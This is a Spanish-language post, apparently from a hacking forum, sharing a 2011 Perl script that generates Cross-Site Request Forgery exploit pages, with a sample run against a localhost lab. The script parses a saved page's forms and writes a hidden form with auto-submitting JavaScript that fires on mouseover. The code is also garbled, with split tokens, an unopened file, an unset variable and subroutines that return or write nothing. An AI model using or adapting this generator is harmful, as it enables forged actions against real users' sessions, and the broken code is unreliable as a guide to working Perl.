Una simple herramienta para ahorrar trabajo en la creacion de un exploit
para la vulnerabildiad Cross Site Request Forgery , despues genera el resultado
en una carpeta creada con el programa con el nombre de la web.
#!usr/bin/perl
#CSRF T00l (C) Doddy Hackman 2011
use HTML::Form;
use URI
::Split qw(uri_split
);
installer();
head();
if($ARGV[0]) {
now($ARGV[0]);
} else {
sintax();
}
copyright();
sub now {
unless(-f $_[0]) {
print "\n[-] File Not Found\n"; copyright();
}
print "\n[+] File to parse : ".$_[0]."\n\n";
my $words = join q(),<FILE>;
my @testar = HTML::Form->parse($words,"/");
$count = 0;
foreach my $test(@testar) {
$count++;
print "\n\n -- == Form $count == --\n\n"; if ($test->attr(name) eq "") {
print "[+] Name : No Found"."\n"; } else {
print "[+] Name : ".$test->attr(name
)."\n"; }
print "[+] Action : ".$test->action."\n"; print "[+] Method : ".$test->method."\n"; print "\n-- == Input == --\n\n"; @inputs = $test->inputs;
print "Type\t\tName\t\tValue\n"; foreach $in(@inputs) {
print $in->value."\t\t\n"; }
}
print "\n\n[+] Form to generate : "; if ($op ne "") {
$op--;
my $probar = (HTML::Form->parse($words,"/"))[$op];
my $action = ver($words,$op);
my $fin = nombre($action).".html";
savefile("<form action=$action method=".$probar->method." name=exploit>",$fin);
@input = $probar->inputs;
foreach $in(@input) {
print "\n[+] Value of the ".$in->name." : "; chomp(my $val = <stdin>); savefile("<input type=hidden name=".$in->name." value=".$val.">",$fin);
}
my $final = "</form><script language=javascript>function colocar(){document.exploit.submit()}
</script><iframe width=6% height=%6 overflow=hidden onmouseover=javascript:colocar()>
";
savefile($final,$fin);
print "\n\n[+] CSRF Exploit Generated\n\n"; print "[+] To can see in logscsrf/".$fin."\n\n"; }
}
sub ver {
my $probar = (HTML::Form->parse($_[0],"/"))[$_[1]];
my $action = $probar->action;
my $co = $action;
if ($action eq "" or $action eq "/"){
print "\n\n[+] Action : "; chomp(my $action = <stdin>); } else {
}
}
sub installer {
unless (-d "logs_csrf/") {
mkdir("logs_csrf/","777"); }}
sub nombre {
my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]);
}
sub savefile {
open (SAVE
,">>logs_csrf/".$_[1]); }
sub sintax {
print "\n[+] sintax : $0 <file>\n"; }
sub head {
print "\n\n -- == CSRF T00l == --\n\n"; }
sub copyright {
print "\n\n -- == Doddy Hackman 2011 == --\n\n"; }
# ¿ The End ?
Ejemplo de uso
C:\Documents and Settings\Administrador\Escritorio\Leviatan\Hacking\WarFactoy II
Finales\CSRF Tool>tool.pl read.txt
-- == CSRF T00l == --
[+] File to parse : read.txt
-- == Form 1 == --
[+] Name : No Found
[+] Action : http://localhost/labs/csrf/csrf.php
[+] Method : GET
-- == Input == --
Type Name Value
text ver
password veras
submit control Agregar
-- == Form 2 == --
[+] Name : No Found
[+] Action : /
[+] Method : POST
-- == Input == --
Type Name Value
text ac
submit ee aaa
[+] Form to generate : 1
[+] Value of the ver : aaa
[+] Value of the veras : aaa
[+] Value of the control : aaa
[+] CSRF Exploit Generated
[+] To can see in logscsrf/localhost.html
-- == Doddy Hackman 2011 == --